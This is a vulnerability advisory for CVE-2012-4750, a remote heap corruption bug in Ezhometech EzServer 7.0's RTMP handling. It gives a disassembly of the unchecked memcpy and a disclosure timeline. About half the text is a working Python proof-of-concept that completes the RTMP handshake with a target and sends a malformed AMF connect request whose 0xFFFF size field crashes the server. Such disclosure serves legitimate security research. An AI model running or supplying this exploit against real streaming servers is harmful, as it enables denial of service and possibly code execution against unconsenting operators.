114 lines
No EOL
4.3 KiB
Text
114 lines
No EOL
4.3 KiB
Text
[Title]:
|
|
Ezhometech EzServer 7.0 Remote Heap Corruption Vulnerability
|
|
|
|
[Description]:
|
|
EzServer is a software for audio and video streaming adopted by various companies worldwide. Version 7.0 is affected by a remote heap corruption vulnerability. Version 6.x is not affected by this issue, as does not implement RTMP support.
|
|
|
|
[Affected Software]:
|
|
http://www.ezhometech.com/ezserver.htm
|
|
|
|
|
|
[Credits]:
|
|
Lorenzo Cantoni
|
|
|
|
[CVE]:
|
|
CVE-2012-4750
|
|
|
|
[CVSS]:
|
|
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|
|
|
|
[Impact]:
|
|
A remote unauthenticated attacker can DoS the application. Remote Command Execution could be possible, however an exploit has yet to be developed.
|
|
|
|
|
|
[Details]:
|
|
The vulnerability is caused by the following lines of code:
|
|
|
|
.text:00474533 cmp [ebp-33A0], 80h
|
|
.text:0047453D jle short loc_47458E
|
|
.text:0047453F mov eax, [ebp-33A0h]
|
|
.text:00474545 sub eax, 80h
|
|
.text:0047454A push eax ; Size
|
|
.text:0047454B mov ecx, [ebp-33CCh]
|
|
.text:00474551 add ecx, 81h
|
|
.text:00474557 push ecx ; Src
|
|
.text:00474558 mov edx, [ebp-33CCh]
|
|
.text:0047455E add edx, 80h
|
|
.text:00474564 push edx ; Dst
|
|
.text:00474565 call _memcpy_0
|
|
|
|
The application pass to memcpy() an uncontrolled size, which is directly taken from the AMF request in the RTMP packet.After have successfully completed the RTMP handshake, an attacker can send a malformed AMF request embedded in the RTMP session, with an high value for the 'size' field (2 bytes, such as 0xFFFF) and a lower-sized 'string' (such as 'connect'). This result in a heap corruption and a crash for the application.
|
|
|
|
[Fix]:
|
|
Support for the RTMP protocol appears disabled (but not fully removed) in version 7.1. However there is no official response from the vendor (see disclosure).
|
|
|
|
[Proof of Concept code]:
|
|
http://pastebin.com/k05djr6C
|
|
|
|
[Disclosure]:
|
|
09/09/2012: Vendor contacted.
|
|
07/10/2012: No response. Sent another mail.
|
|
13/10/2012: Still no response. Disclosure.
|
|
|
|
|
|
#Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerability POC code
|
|
#Author: Lorenzo Cantoni
|
|
#CVE: CVE-2012-4750
|
|
#Link to vulnerable software: http://www.4shared.com/zip/eVs9I2Gf/ezserver70001_win.html
|
|
|
|
from socket import *
|
|
import sys
|
|
import os
|
|
import time
|
|
|
|
version = "\x03"
|
|
zero_pad="\x00" * 4
|
|
|
|
c1_finger= "\x05\xaf\x52\x83\x0b\xd2\x11\xa5\x48\x88\x94\xcc\x0b\x05\x22\x55\x04\x87\x11\xcd\x19\x85\x10\xa9\xe9\x43\xbf\x8b\x83\x91\x98\x45\x5f\xbd\x41\x07\x30\x05\xd3\x03\x99\x0b\x88\xd9\xb6\x36\x56\xd4\x3c\xfe\xc8\xed\x83\x74\x8f\x4b\x0f\x0f\xc5\x12\x02\x16\x79\x4b\x22\xa0\x54\xe5\xbc\x58\xab\xd8\xc4\x10\x96\x07\x08\x84\x39\x34\x53\xce\x50\x96\x94\xaf\xbe\xab\xe0"
|
|
|
|
c1 = os.urandom(1537 - len(version+ zero_pad+c1_finger))
|
|
|
|
c0c1 = version + zero_pad + c1 + c1_finger
|
|
|
|
|
|
if len(sys.argv) >=2:
|
|
server = sys.argv[1]
|
|
else:
|
|
server ="192.168.1.65"
|
|
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
|
|
s.connect((server,1935))
|
|
|
|
# Handshake C0+C1 (sent by client)
|
|
|
|
s.send(c0c1)
|
|
time.sleep(2)
|
|
|
|
# Handshake S0+S1+S2 (sent by server)
|
|
s0s1s2= s.recv(1700)
|
|
time.sleep(2)
|
|
# Handshake C2
|
|
#parse the payload which has to be echoed back to the server
|
|
echo = s0s1s2[1:1537]
|
|
|
|
c2 = echo
|
|
s.send(c2)
|
|
time.sleep(2)
|
|
|
|
# connect('live')
|
|
size = '\x00\x00\x79'
|
|
header = '\x03\x00\x00\x00' + size +'\x14\x00\x00\x00\x00'
|
|
size_2 = '\xff\xff' # TRIGGERS THE VULNERABILITY - legit size: \x00\x07
|
|
body_0 = '\x02' + size_2
|
|
req = '\x63\x6f\x6e\x6e\x65\x63\x74' # connect
|
|
body_1 = '\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x03\x00\x03\x61\x70\x70\x02\x00\x04'
|
|
param = '\x6c\x69\x76\x65' #live
|
|
body_2 = '\x00\x08\x66\x6c\x61\x73\x68\x56\x65\x72\x02\x00\x0d\x4c\x4e\x58\x20\x39\x2c\x30\x2c\x31\x32\x34\x2c\x32\x00\x05\x74\x63\x55\x72\x6c\x02\x00\x1d'
|
|
url = 'rtmp://' + str(sys.argv[1]) + ':1935/live'
|
|
body_3 = '\x00\x04\x66\x70\x61\x64\x01\x00\x00\x0c\x63\x61\x70\x61\x62\x69\x6c\x69\x74\x69\x65\x73\x00\x40\x2e\x00\x00\x00\x00\x00\x00\xc3\x00\x0b\x61\x75\x64\x69\x6f\x43\x6f\x64\x65\x63\x73\x00\x40\x99\x9c\x00\x00\x00\x00\x00\x00\x0b\x76\x69\x64\x65\x6f\x43\x6f\x64\x65\x63\x73\x00\x40\x6f\x80\x00\x00\x00\x00\x00\x00\x0d\x76\x69\x64\x65\x6f\x46\x75\x6e\x63\x74\x69\x6f\x6e\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x09'
|
|
|
|
conn_live = header+ body_0 + req + body_1 + param + body_2 + url + body_3
|
|
|
|
s.send(conn_live) |